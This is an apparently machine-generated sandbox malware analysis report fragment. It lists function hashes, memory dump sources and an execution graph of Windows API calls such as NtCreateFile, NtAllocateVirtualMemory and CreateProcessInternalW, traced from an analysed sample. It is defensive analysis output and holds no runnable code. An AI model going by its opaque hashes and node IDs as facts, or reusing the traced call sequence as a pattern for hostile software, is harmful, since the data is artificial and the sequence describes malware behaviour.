                                                                                                                        • Opcode Fuzzy Hash: cfdb0bd2f1969fb07bba72c82375319e5148e2c7066f36fa055981596ca8d8f8
                                                                                                                        • Instruction Fuzzy Hash: 2D314FB1E10209ABEB11DBA4DC45BEF73BCFF54304F008199E904A6240E775AA058BA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 05039984 Relevance: 5.1, Strings: 4, Instructions: 71COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: [$m$t$y
                                                                                                                        • API String ID: 0-3854059060
                                                                                                                        • Opcode ID: 69481cf968ff726dfffa150feb45b131cc131143ab88505d2b9d20da3706b2e5
                                                                                                                        • Instruction ID: 56a30e37e4d7ecde254d213418b9ed7d1a56581792347ea7ae2bfc04e9d52d2e
                                                                                                                        • Opcode Fuzzy Hash: 69481cf968ff726dfffa150feb45b131cc131143ab88505d2b9d20da3706b2e5
                                                                                                                        • Instruction Fuzzy Hash: D621ACB19007049BC724DF59E4489AFB7F9EF88310F10866EE84A9B710E7B5EA458BD0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 050517F4 Relevance: 5.0, Strings: 4, Instructions: 34COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000005.00000002.3839294519.0000000005020000.00000040.00000001.00040000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_5_2_5020000_mNtjNwEeCHVoSqPJEzBvhXy.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: -$A$I$M
                                                                                                                        • API String ID: 0-1664541526
                                                                                                                        • Opcode ID: 57f0a877aed1c77d67a2b5ad59eacb8fe769536fd2ad85c2f7bdbd0daf0521fe
                                                                                                                        • Instruction ID: 70b5fe57eb20e794f2135883e242def16932a052ed646e868d2c4de40c90433b
                                                                                                                        • Opcode Fuzzy Hash: 57f0a877aed1c77d67a2b5ad59eacb8fe769536fd2ad85c2f7bdbd0daf0521fe
                                                                                                                        • Instruction Fuzzy Hash: FBF08272D01218AADF50DA94AC09BFE7BFCBB44314F4045A6ED4896281E7F26A58CBD1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:2.8%
                                                                                                                        Dynamic/Decrypted Code Coverage:2.2%
                                                                                                                        Signature Coverage:1.8%
                                                                                                                        Total number of Nodes:905
                                                                                                                        Total number of Limit Nodes:109
                                                                                                                        execution_graph 98744 704d70 98745 704d8d 98744->98745 98750 705f10 98745->98750 98747 704d9e 98754 3032af0 LdrInitializeThunk 98747->98754 98748 704dc9 98751 705f1f 98750->98751 98753 705f85 98750->98753 98751->98753 98755 700900 98751->98755 98753->98747 98754->98748 98756 70091a 98755->98756 98757 70090e 98755->98757 98756->98753 98757->98756 98760 700d80 LdrLoadDll 98757->98760 98759 700a6c 98759->98753 98760->98759 98761 7007f0 98764 7007ff 98761->98764 98762 70088c 98763 700846 98769 706d20 98763->98769 98764->98762 98764->98763 98767 700887 98764->98767 98768 706d20 2 API calls 98767->98768 98768->98762 98772 705210 98769->98772 98771 700856 98773 70522a 98772->98773 98774 705f10 LdrLoadDll 98773->98774 98775 70523b RtlFreeHeap 98774->98775 98775->98771 98776 6fff27 98777 6ffeca 98776->98777 98777->98776 98778 6fffca 98777->98778 98792 704dd0 98777->98792 98780 6ffff2 98781 700009 98780->98781 98803 704bb0 LdrLoadDll 98780->98803 98783 700010 98781->98783 98784 700025 98781->98784 98785 704f10 2 API calls 98783->98785 98799 704f10 98784->98799 98787 700019 98785->98787 98788 70005a 98789 70002e 98789->98788 98790 706d20 2 API calls 98789->98790 98791 70004e 98790->98791 98793 704df1 98792->98793 98794 704e42 98792->98794 98795 705f10 LdrLoadDll 98793->98795 98796 705f10 LdrLoadDll 98794->98796 98797 704e0e 98795->98797 98798 704e58 NtReadFile 98796->98798 98797->98780 98798->98780 98800 704f2a 98799->98800 98801 705f10 LdrLoadDll 98800->98801 98802 704f3b NtClose 98801->98802 98802->98789 98803->98781 98804 6f51a5 98809 6f7130 98804->98809 98807 6f51d0 98808 6f51fc 98807->98808 98813 6f70b0 98807->98813 98810 6f7143 98809->98810 98821 704570 98810->98821 98812 6f716e 98812->98807 98831 704240 98813->98831 98815 6f70f4 98820 6f7115 98815->98820 98838 7043d0 98815->98838 98817 6f7105 98818 6f7121 98817->98818 98819 704f10 2 API calls 98817->98819 98818->98807 98819->98820 98820->98807 98822 704591 98821->98822 98823 7045c6 98821->98823 98825 705f10 LdrLoadDll 98822->98825 98824 705f10 LdrLoadDll 98823->98824 98826 7045dc 98824->98826 98827 7045ae 98825->98827 98830 3032dd0 LdrInitializeThunk 98826->98830 98827->98812 98828 7045eb 98828->98812 98830->98828 98832 70429b 98831->98832 98833 70425e 98831->98833 98835 705f10 LdrLoadDll 98832->98835 98834 705f10 LdrLoadDll 98833->98834 98836 70427b 98834->98836 98837 7042b1 98835->98837 98836->98815 98837->98815 98839 7043ee 98838->98839 98840 704423 98838->98840 98841 705f10 LdrLoadDll 98839->98841 98842 705f10 LdrLoadDll 98840->98842 98843 70440b 98841->98843 98844 704439 98842->98844 98843->98817 98847 3034650 LdrInitializeThunk 98844->98847 98845 704448 98845->98817 98847->98845 98848 6e99a0 98850 6e9d27 98848->98850 98851 6ea231 98850->98851 98852 7069b0 98850->98852 98853 7069d6 98852->98853 98860 6f2e30 98853->98860 98855 706a10 98867 705260 LdrLoadDll 98855->98867 98856 7069e2 98856->98855 98863 703250 98856->98863 98859 706a21 98859->98851 98862 6f2e3d 98860->98862 98868 6f2d80 98860->98868 98862->98856 98864 7032aa 98863->98864 98866 7032b7 98864->98866 98899 6f1d00 98864->98899 98866->98855 98867->98859 98869 6f2d97 98868->98869 98885 701db0 LdrLoadDll 98868->98885 98875 701e10 98869->98875 98872 6f2da3 98874 6f2db0 98872->98874 98878 7058a0 98872->98878 98874->98862 98886 705180 98875->98886 98880 7058b8 98878->98880 98879 7058dc 98879->98874 98880->98879 98890 704640 98880->98890 98883 706d20 2 API calls 98884 70594a 98883->98884 98884->98874 98885->98869 98887 70519a 98886->98887 98888 705f10 LdrLoadDll 98887->98888 98889 701e2d 98888->98889 98889->98872 98891 70465d 98890->98891 98892 705f10 LdrLoadDll 98891->98892 98893 70466e 98892->98893 98896 3032c0a 98893->98896 98894 704689 98894->98883 98897 3032c11 98896->98897 98898 3032c1f LdrInitializeThunk 98896->98898 98897->98894 98898->98894 98900 6f1d38 98899->98900 98917 6f6ed0 98900->98917 98902 6f1d40 98903 6f1f99 98902->98903 98929 706e00 98902->98929 98903->98866 98905 6f1d56 98906 706e00 2 API calls 98905->98906 98907 6f1d64 98906->98907 98908 706e00 2 API calls 98907->98908 98909 6f1d75 98908->98909 98932 6f5540 98909->98932 98911 6f1dda 98916 6f1e02 98911->98916 98962 6f6140 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98911->98962 98913 6f1d82 98913->98911 98961 6f56c0 LdrLoadDll 98913->98961 98942 6f1810 98916->98942 98918 6f6efc 98917->98918 98963 6f4290 98918->98963 98920 6f6f0e 98967 6f6dc0 98920->98967 98923 6f6f29 98925 6f6f34 98923->98925 98927 704f10 2 API calls 98923->98927 98924 6f6f41 98926 6f6f52 98924->98926 98928 704f10 2 API calls 98924->98928 98925->98902 98926->98902 98927->98925 98928->98926 98998 7051c0 98929->98998 98931 706e1b 98931->98905 98933 6f5556 98932->98933 98934 6f5560 98932->98934 98933->98913 98935 6f41e0 LdrLoadDll 98934->98935 98936 6f55f9 98935->98936 98937 6f4120 LdrLoadDll 98936->98937 98939 6f560d 98937->98939 98938 6f5633 98938->98913 98939->98938 98940 6f41e0 LdrLoadDll 98939->98940 98941 6f565a 98940->98941 98941->98913 99003 6f7190 98942->99003 98944 6f1cf5 98944->98903 98945 6f182a 98945->98944 99009 6ffe10 98945->99009 98948 6f1a2e 99017 707f30 98948->99017 98950 6f1888 98950->98944 99012 707e00 98950->99012 98951 6f1a43 98957 6f1a59 98951->98957 99023 6efff0 98951->99023 98952 6efff0 4 API calls 98952->98957 98954 6f7130 2 API calls 98954->98957 98955 6f1b10 98955->98957 99036 6f02b0 98955->99036 98957->98944 98957->98952 98957->98954 98959 6f02b0 2 API calls 98957->98959 98958 6f7130 LdrLoadDll LdrInitializeThunk 98960 6f1b89 98958->98960 98959->98957 98960->98957 98960->98958 98961->98911 98962->98916 98964 6f42d6 98963->98964 98977 6f4120 98964->98977 98966 6f4369 98966->98920 98968 6f6eb6 98967->98968 98969 6f6dda 98967->98969 98968->98923 98968->98924 98982 6f41e0 98969->98982 98971 6f6e1f 98987 704690 98971->98987 98973 6f6e64 98991 7046e0 98973->98991 98976 704f10 2 API calls 98976->98968 98978 6f4144 98977->98978 98981 704110 LdrLoadDll 98978->98981 98980 6f417e 98980->98966 98981->98980 98983 6f4205 98982->98983 98984 6f4120 LdrLoadDll 98983->98984 98986 6f4210 98983->98986 98985 6f4258 98984->98985 98985->98971 98986->98971 98988 7046ad 98987->98988 98989 705f10 LdrLoadDll 98988->98989 98990 7046be 98989->98990 98990->98973 98992 7046fd 98991->98992 98993 705f10 LdrLoadDll 98992->98993 98994 70470e 98993->98994 98997 30335c0 LdrInitializeThunk 98994->98997 98995 6f6eaa 98995->98976 98997->98995 98999 7051dd 98998->98999 99000 705f10 LdrLoadDll 98999->99000 99001 7051ee RtlAllocateHeap 99000->99001 99002 705203 99001->99002 99002->98931 99004 6f719d 99003->99004 99005 700900 LdrLoadDll 99004->99005 99006 6f71b7 99005->99006 99007 6f71be SetErrorMode 99006->99007 99008 6f71c5 99006->99008 99007->99008 99008->98945 99011 6ffe31 99009->99011 99040 706c90 99009->99040 99011->98950 99013 707e10 99012->99013 99014 707e16 99012->99014 99013->98948 99015 706e00 2 API calls 99014->99015 99016 707e3c 99015->99016 99016->98948 99018 707ea0 99017->99018 99019 706e00 2 API calls 99018->99019 99022 707efd 99018->99022 99020 707eda 99019->99020 99021 706d20 2 API calls 99020->99021 99021->99022 99022->98951 99024 6efffb 99023->99024 99025 6f0000 99023->99025 99024->98955 99026 706c90 2 API calls 99025->99026 99029 6f0025 99026->99029 99027 6f008c 99027->98955 99029->99027 99030 6f0092 99029->99030 99035 706c90 2 API calls 99029->99035 99050 7045f0 99029->99050 99056 705130 99029->99056 99031 6f00bc 99030->99031 99033 705130 2 API calls 99030->99033 99031->98955 99034 6f00ad 99033->99034 99034->98955 99035->99029 99037 6f02cc 99036->99037 99038 705130 2 API calls 99037->99038 99039 6f02d2 99038->99039 99039->98960 99043 705040 99040->99043 99042 706cc1 99042->99011 99044 705061 99043->99044 99045 7050a6 99043->99045 99046 705f10 LdrLoadDll 99044->99046 99047 705f10 LdrLoadDll 99045->99047 99048 70507e 99046->99048 99049 7050bc NtAllocateVirtualMemory 99047->99049 99048->99042 99049->99042 99051 70460a 99050->99051 99052 705f10 LdrLoadDll 99051->99052 99053 70461b 99052->99053 99062 3032df0 LdrInitializeThunk 99053->99062 99054 704632 99054->99029 99057 70514d 99056->99057 99058 705f10 LdrLoadDll 99057->99058 99059 70515e 99058->99059 99063 3032c70 LdrInitializeThunk 99059->99063 99060 705175 99060->99029 99062->99054 99063->99060 99064 6f6620 99065 6f663c 99064->99065 99069 6f671c 99064->99069 99067 704f10 2 API calls 99065->99067 99065->99069 99066 6f67b2 99068 6f6657 99067->99068 99078 6f5c80 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 99068->99078 99069->99066 99079 6f5c80 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 99069->99079 99071 6f678c 99071->99066 99080 6f5e50 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 99071->99080 99074 6f668c 99075 6f41e0 LdrLoadDll 99074->99075 99076 6f66b9 99075->99076 99077 6f41e0 LdrLoadDll 99076->99077 99077->99069 99078->99074 99079->99071 99080->99066 99081 6feea0 99082 6feebd 99081->99082 99105 6f3f00 99082->99105 99084 6feedb 99085 700900 LdrLoadDll 99084->99085 99102 6ff0dc 99084->99102 99086 6fef08 99085->99086 99087 700900 LdrLoadDll 99086->99087 99088 6fef21 99087->99088 99089 700900 LdrLoadDll 99088->99089 99090 6fef3a 99089->99090 99091 700900 LdrLoadDll 99090->99091 99092 6fef56 99091->99092 99093 700900 LdrLoadDll 99092->99093 99094 6fef6f 99093->99094 99095 700900 LdrLoadDll 99094->99095 99096 6fef88 99095->99096 99097 700900 LdrLoadDll 99096->99097 99098 6fefa4 99097->99098 99099 700900 LdrLoadDll 99098->99099 99100 6fefbd 99099->99100 99101 700900 LdrLoadDll 99100->99101 99103 6fefd5 99101->99103 99103->99102 99110 6fea60 LdrLoadDll 99103->99110 99107 6f3f24 99105->99107 99106 6f3f2b 99106->99084 99107->99106 99108 6f3f77 99107->99108 99109 6f3f60 LdrLoadDll 99107->99109 99108->99084 99109->99108 99110->99103 99111 6fe920 99114 6fd5b0 99111->99114 99115 6fd5ba 99114->99115 99116 6f41e0 LdrLoadDll 99115->99116 99117 6fd62d 99116->99117 99118 6f41e0 LdrLoadDll 99117->99118 99119 6fd66d 99117->99119 99118->99119 99124 6f7380 99119->99124 99121 6fd758 99122 6fd751 99122->99121 99129 6fd290 99122->99129 99125 700900 LdrLoadDll 99124->99125 99126 6f73a1 99125->99126 99127 6f73a8 GetFileAttributesW 99126->99127 99128 6f73b3 99126->99128 99127->99128 99128->99122 99130 6fd2b3 99129->99130 99152 701aa0 99130->99152 99132 6fd312 99132->99122 99133 6fd2c0 99133->99132 99134 6fd2df 99133->99134 99135 6fd31e 99133->99135 99136 6fd2e7 99134->99136 99137 6fd304 99134->99137 99140 6f41e0 LdrLoadDll 99135->99140 99138 706d20 2 API calls 99136->99138 99139 706d20 2 API calls 99137->99139 99141 6fd2f8 99138->99141 99139->99132 99142 6fd340 99140->99142 99141->99122 99190 6fc5d0 99142->99190 99144 6fd362 99148 6fd37a 99144->99148 99149 6fd468 99144->99149 99145 706d20 2 API calls 99146 6fd573 99145->99146 99146->99122 99147 6fd44f 99147->99145 99148->99147 99195 6fcbf0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 99148->99195 99149->99147 99196 6fcbf0 LdrLoadDll NtAllocateVirtualMemory RtlFreeHeap 99149->99196 99153 701aae 99152->99153 99154 701ab5 99152->99154 99153->99133 99155 6f3f00 LdrLoadDll 99154->99155 99156 701aea 99155->99156 99159 701af9 99156->99159 99197 701580 LdrLoadDll 99156->99197 99158 706e00 2 API calls 99160 701b12 99158->99160 99159->99158 99161 701cef 99159->99161 99160->99161 99162 701b27 99160->99162 99163 701c9a 99160->99163 99161->99133 99198 6fc6f0 LdrLoadDll 99162->99198 99164 701c2c 99163->99164 99165 701ca4 99163->99165 99168 706d20 2 API calls 99164->99168 99189 701c91 99164->99189 99199 6fc6f0 LdrLoadDll 99165->99199 99167 701b3e 99172 700900 LdrLoadDll 99167->99172 99168->99161 99170 701cbb 99200 700e50 LdrLoadDll 99170->99200 99174 701b5a 99172->99174 99173 701cd1 99175 700900 LdrLoadDll 99173->99175 99176 700900 LdrLoadDll 99174->99176 99175->99161 99177 701b76 99176->99177 99178 700900 LdrLoadDll 99177->99178 99179 701b95 99178->99179 99180 700900 LdrLoadDll 99179->99180 99181 701bb1 99180->99181 99182 700900 LdrLoadDll 99181->99182 99183 701bcd 99182->99183 99184 700900 LdrLoadDll 99183->99184 99185 701bec 99184->99185 99186 700900 LdrLoadDll 99185->99186 99187 701c08 99186->99187 99188 700900 LdrLoadDll 99187->99188 99188->99164 99189->99133 99191 6fc5e6 99190->99191 99192 6fc5f3 99191->99192 99193 706d20 2 API calls 99191->99193 99192->99144 99194 6fc62c 99193->99194 99194->99144 99195->99148 99196->99149 99197->99159 99198->99167 99199->99170 99200->99173 99201 6f0720 99202 6f073a 99201->99202 99203 6f3f00 LdrLoadDll 99202->99203 99204 6f0758 99203->99204 99205 700900 LdrLoadDll 99204->99205 99206 6f076e 99205->99206 99207 6f078c PostThreadMessageW 99206->99207 99208 6f079d 99206->99208 99207->99208 99209 6f67e0 99210 6f6852 99209->99210 99211 6f67f8 99209->99211 99211->99210 99215 6f9e80 99211->99215 99213 6f683c 99213->99210 99223 6fa110 99213->99223 99216 6f9ea5 99215->99216 99217 6f41e0 LdrLoadDll 99216->99217 99218 6f9f87 99217->99218 99219 6f41e0 LdrLoadDll 99218->99219 99220 6f9fbf 99219->99220 99221 6f41e0 LdrLoadDll 99220->99221 99222 6fa07e 99220->99222 99221->99222 99222->99213 99224 6fa136 99223->99224 99225 700900 LdrLoadDll 99224->99225 99227 6fa18a 99225->99227 99226 6fa4fa 99226->99210 99227->99226 99270 7052a0 99227->99270 99229 6fa1db 99230 6fa4e2 99229->99230 99232 707f30 3 API calls 99229->99232 99231 706d20 2 API calls 99230->99231 99231->99226 99233 6fa1f7 99232->99233 99233->99230 99234 6fa2fd 99233->99234 99235 704640 2 API calls 99233->99235 99277 6f5220 99234->99277 99236 6fa27e 99235->99236 99236->99234 99241 6fa286 99236->99241 99239 6fa2e3 99243 706d20 2 API calls 99239->99243 99240 6fa2b2 99246 704f10 2 API calls 99240->99246 99241->99226 99241->99239 99241->99240 99274 6f5120 99241->99274 99242 6fa35a 99250 6fa38a 99242->99250 99251 6fa4c1 99242->99251 99247 6fa2f3 99243->99247 99245 6f5120 2 API calls 99245->99242 99248 6fa2c2 99246->99248 99247->99210 99322 702430 LdrLoadDll LdrInitializeThunk 99248->99322 99282 704fa0 99250->99282 99253 706d20 2 API calls 99251->99253 99254 6fa4d8 99253->99254 99254->99210 99255 6fa3a9 99291 6f6f60 99255->99291 99257 6fa412 99257->99230 99258 6fa41d 99257->99258 99259 706d20 2 API calls 99258->99259 99260 6fa441 99259->99260 99298 7048a0 99260->99298 99264 6fa47c 99265 6fa483 99264->99265 99266 7048a0 2 API calls 99264->99266 99265->99210 99267 6fa4a9 99266->99267 99313 704450 99267->99313 99269 6fa4b7 99269->99210 99271 7052bd 99270->99271 99272 705f10 LdrLoadDll 99271->99272 99273 7052ce CreateProcessInternalW 99272->99273 99273->99229 99275 7047e0 2 API calls 99274->99275 99276 6f515e 99275->99276 99276->99240 99278 704640 2 API calls 99277->99278 99279 6f5256 99278->99279 99280 704fa0 2 API calls 99279->99280 99281 6f526b 99280->99281 99281->99230 99281->99242 99281->99245 99283 704fc1 99282->99283 99284 705002 99282->99284 99286 705f10 LdrLoadDll 99283->99286 99285 705f10 LdrLoadDll 99284->99285 99287 705018 99285->99287 99288 704fde 99286->99288 99323 3032e80 LdrInitializeThunk 99287->99323 99288->99255 99289 705033 99289->99255 99292 6f6f7d 99291->99292 99324 704730 99292->99324 99294 6f6fcd 99295 6f6fd4 99294->99295 99296 7047e0 2 API calls 99294->99296 99295->99257 99297 6f6ffd 99296->99297 99297->99257 99299 7048ba 99298->99299 99300 705f10 LdrLoadDll 99299->99300 99301 7048cb 99300->99301 99334 3032d30 LdrInitializeThunk 99301->99334 99302 6fa455 99304 7047e0 99302->99304 99305 704801 99304->99305 99306 704856 99304->99306 99308 705f10 LdrLoadDll 99305->99308 99307 705f10 LdrLoadDll 99306->99307 99309 70486c 99307->99309 99310 70481e 99308->99310 99335 3032d10 LdrInitializeThunk 99309->99335 99310->99264 99311 70489b 99311->99264 99314 704471 99313->99314 99315 7044a6 99313->99315 99316 705f10 LdrLoadDll 99314->99316 99317 705f10 LdrLoadDll 99315->99317 99319 70448e 99316->99319 99318 7044bc 99317->99318 99336 3032fb0 LdrInitializeThunk 99318->99336 99319->99269 99320 7044cb 99320->99269 99322->99239 99323->99289 99325 704797 99324->99325 99326 70474e 99324->99326 99328 705f10 LdrLoadDll 99325->99328 99327 705f10 LdrLoadDll 99326->99327 99330 70476b 99327->99330 99329 7047ad 99328->99329 99333 3032f30 LdrInitializeThunk 99329->99333 99330->99294 99331 7047d0 99331->99294 99333->99331 99334->99302 99335->99311 99336->99320 99337 6ff7a0 99338 6ff7c8 99337->99338 99339 6f41e0 LdrLoadDll 99338->99339 99340 6ff802 99339->99340 99366 6f59f0 99340->99366 99342 6ff82f 99343 6ff828 99343->99342 99344 6f41e0 LdrLoadDll 99343->99344 99345 6ff86b 99344->99345 99346 6f41e0 LdrLoadDll 99345->99346 99347 6ff8a0 99346->99347 99377 6f5b00 99347->99377 99349 6ff8c4 99350 6ff906 99349->99350 99364 6ffa9a 99349->99364 99381 6ff4f0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 99349->99381 99352 6f41e0 LdrLoadDll 99350->99352 99353 6ff937 99352->99353 99354 6f5b00 2 API calls 99353->99354 99357 6ff95b 99354->99357 99355 6ff9a1 99356 6f5b00 2 API calls 99355->99356 99360 6ff9d1 99356->99360 99357->99355 99357->99364 99382 6ff4f0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 99357->99382 99359 6ffa17 99362 6f5b00 2 API calls 99359->99362 99360->99359 99360->99364 99383 6ff4f0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 99360->99383 99363 6ffa76 99362->99363 99363->99364 99384 6ff4f0 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 99363->99384 99367 6f5a23 99366->99367 99385 704ab0 99367->99385 99370 6f5a47 99370->99343 99374 6f5a82 99375 704f10 2 API calls 99374->99375 99376 6f5aea 99375->99376 99376->99343 99378 6f5b25 99377->99378 99400 7048e0 99378->99400 99381->99350 99382->99355 99383->99359 99384->99364 99386 704aca 99385->99386 99387 705f10 LdrLoadDll 99386->99387 99388 6f5a40 99387->99388 99388->99370 99389 704b00 99388->99389 99390 704b1d 99389->99390 99391 705f10 LdrLoadDll 99390->99391 99392 704b2e 99391->99392 99399 3032ca0 LdrInitializeThunk 99392->99399 99393 6f5a6a 99393->99370 99395 705410 99393->99395 99396 70542a 99395->99396 99397 705f10 LdrLoadDll 99396->99397 99398 70543b 99397->99398 99398->99374 99399->99393 99401 7048fd 99400->99401 99402 705f10 LdrLoadDll 99401->99402 99403 70490e 99402->99403 99406 3032c60 LdrInitializeThunk 99403->99406 99404 6f5b99 99404->99349 99406->99404 99407 700460 99408 70047c 99407->99408 99419 704c00 99408->99419 99411 7004a4 99413 704f10 2 API calls 99411->99413 99412 7004b8 99414 704f10 2 API calls 99412->99414 99415 7004ad 99413->99415 99416 7004c1 99414->99416 99423 706e40 LdrLoadDll RtlAllocateHeap 99416->99423 99418 7004cc 99420 704c1d 99419->99420 99421 705f10 LdrLoadDll 99420->99421 99422 70049d 99421->99422 99422->99411 99422->99412 99423->99418 99424 707e60 99425 706d20 2 API calls 99424->99425 99426 707e75 99425->99426 99427 6f22ff 99428 6f59f0 3 API calls 99427->99428 99429 6f2323 99428->99429 99430 704ca0 99431 704d17 99430->99431 99432 704cbe 99430->99432 99433 705f10 LdrLoadDll 99431->99433 99434 705f10 LdrLoadDll 99432->99434 99435 704d2d NtCreateFile 99433->99435 99436 704cdb 99434->99436 99437 6f2c7c 99438 6f6dc0 3 API calls 99437->99438 99439 6f2c8c 99438->99439 99440 6f2cba 99439->99440 99441 6f2ca1 99439->99441 99442 704f10 2 API calls 99439->99442 99445 6ef700 LdrLoadDll 99441->99445 99442->99441 99444 6f2cab 99445->99444 99446 3032ad0 LdrInitializeThunk 99447 6f68b4 99448 6f683d 99447->99448 99449 6f68bb 99447->99449 99450 6f6852 99448->99450 99451 6fa110 12 API calls 99448->99451 99451->99450 99452 6f9c30 99457 6f9960 99452->99457 99454 6f9c3d 99477 6f9600 99454->99477 99456 6f9c43 99458 6f9985 99457->99458 99459 6f41e0 LdrLoadDll 99458->99459 99460 6f9a15 99459->99460 99461 6f41e0 LdrLoadDll 99460->99461 99462 6f9a74 99461->99462 99463 6f7380 2 API calls 99462->99463 99464 6f9abb 99463->99464 99465 6f9ac2 99464->99465 99466 701aa0 3 API calls 99464->99466 99465->99454 99468 6f9ad0 99466->99468 99467 6f9ad9 99467->99454 99468->99467 99469 6f41e0 LdrLoadDll 99468->99469 99470 6f9b39 99469->99470 99472 6f9bc1 99470->99472 99489 6f9060 99470->99489 99474 6f9c19 99472->99474 99498 6f93c0 99472->99498 99475 706d20 2 API calls 99474->99475 99476 6f9c20 99475->99476 99476->99454 99478 6f9616 99477->99478 99485 6f9621 99477->99485 99479 706e00 2 API calls 99478->99479 99479->99485 99480 6f9637 99480->99456 99481 6f7380 2 API calls 99481->99485 99482 6f992e 99483 6f9947 99482->99483 99484 706d20 2 API calls 99482->99484 99483->99456 99484->99483 99485->99480 99485->99481 99485->99482 99486 6f9060 3 API calls 99485->99486 99487 6f41e0 LdrLoadDll 99485->99487 99488 6f93c0 2 API calls 99485->99488 99486->99485 99487->99485 99488->99485 99490 6f9086 99489->99490 99491 6fc5d0 2 API calls 99490->99491 99492 6f90ed 99491->99492 99493 6f910b 99492->99493 99494 6f926a 99492->99494 99495 6f924f 99493->99495 99502 6f8f30 99493->99502 99494->99495 99497 6f8f30 3 API calls 99494->99497 99495->99470 99497->99494 99499 6f93e6 99498->99499 99500 6fc5d0 2 API calls 99499->99500 99501 6f9462 99500->99501 99501->99472 99503 6f8f46 99502->99503 99506 6fcad0 99503->99506 99505 6f904e 99505->99493 99508 6fcb0d 99506->99508 99507 6fcbbd 99507->99505 99508->99507 99510 6fcb60 99508->99510 99513 6fdbc0 99508->99513 99511 6fcb99 99510->99511 99512 706d20 2 API calls 99510->99512 99511->99505 99512->99511 99516 6fd8d0 99513->99516 99515 6fdbd4 99515->99510 99517 6fd8f6 99516->99517 99519 706c90 2 API calls 99517->99519 99521 6fd916 99517->99521 99518 6fdbb2 99518->99515 99519->99521 99520 6fd9fe 99520->99518 99525 6fdb94 99520->99525 99529 6eb380 99520->99529 99521->99518 99521->99520 99522 6f41e0 LdrLoadDll 99521->99522 99523 6fda7a 99522->99523 99524 6f41e0 LdrLoadDll 99523->99524 99524->99520 99526 706d20 2 API calls 99525->99526 99528 6fdba4 99526->99528 99528->99515 99530 706c90 2 API calls 99529->99530 99531 6ec9f1 99530->99531 99531->99525 99532 6fb1b0 99533 6fb1d8 99532->99533 99534 706e00 2 API calls 99533->99534 99536 6fb238 99534->99536 99535 6fb241 99536->99535 99563 6fa510 99536->99563 99538 6fb26a 99539 6fb28a 99538->99539 99593 6fa860 LdrLoadDll 99538->99593 99541 6fb2a8 99539->99541 99595 6fd040 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 99539->99595 99548 6fb2c2 99541->99548 99597 6f4050 LdrLoadDll 99541->99597 99542 6fb278 99542->99539 99594 6faee0 LdrLoadDll RtlFreeHeap 99542->99594 99545 6fb29c 99596 6fd040 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 99545->99596 99549 6fa510 4 API calls 99548->99549 99550 6fb2ef 99549->99550 99551 6fb310 99550->99551 99598 6fa860 LdrLoadDll 99550->99598 99552 6fb32e 99551->99552 99600 6fd040 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 99551->99600 99555 6fb348 99552->99555 99602 6f4050 LdrLoadDll 99552->99602 99559 706d20 2 API calls 99555->99559 99556 6fb2fe 99556->99551 99599 6faee0 LdrLoadDll RtlFreeHeap 99556->99599 99557 6fb322 99601 6fd040 LdrLoadDll GetFileAttributesW NtAllocateVirtualMemory RtlFreeHeap 99557->99601 99562 6fb352 99559->99562 99564 6fa5a8 99563->99564 99565 6f41e0 LdrLoadDll 99564->99565 99566 6fa66e 99565->99566 99567 6f41e0 LdrLoadDll 99566->99567 99568 6fa69a 99567->99568 99569 6f5b00 2 API calls 99568->99569 99570 6fa6bf 99569->99570 99571 6fa809 99570->99571 99603 7049a0 99570->99603 99573 6fa81d 99571->99573 99575 6f9e80 LdrLoadDll 99571->99575 99573->99538 99575->99573 99576 6fa7ff 99577 704f10 2 API calls 99576->99577 99577->99571 99578 6fa6f8 99579 704f10 2 API calls 99578->99579 99580 6fa732 99579->99580 99609 706ee0 LdrLoadDll 99580->99609 99582 6fa76b 99582->99573 99583 6f5b00 2 API calls 99582->99583 99584 6fa791 99583->99584 99584->99573 99585 7049a0 2 API calls 99584->99585 99586 6fa7b6 99585->99586 99587 6fa7bd 99586->99587 99588 6fa7e9 99586->99588 99590 704f10 2 API calls 99587->99590 99589 704f10 2 API calls 99588->99589 99591 6fa7f3 99589->99591 99592 6fa7c7 99590->99592 99591->99538 99592->99538 99593->99542 99594->99539 99595->99545 99596->99541 99597->99548 99598->99556 99599->99551 99600->99557 99601->99552 99602->99555 99604 7049bd 99603->99604 99605 705f10 LdrLoadDll 99604->99605 99606 7049ce 99605->99606 99610 3032be0 LdrInitializeThunk 99606->99610 99607 6fa6ed 99607->99576 99607->99578 99609->99582 99610->99607 99611 703c10 99612 703c6a 99611->99612 99614 703c77 99612->99614 99615 7021c0 99612->99615 99616 706c90 2 API calls 99615->99616 99618 702201 99615->99618 99616->99618 99617 702306 99617->99614 99618->99617 99619 6f3f00 LdrLoadDll 99618->99619 99620 702247 99619->99620 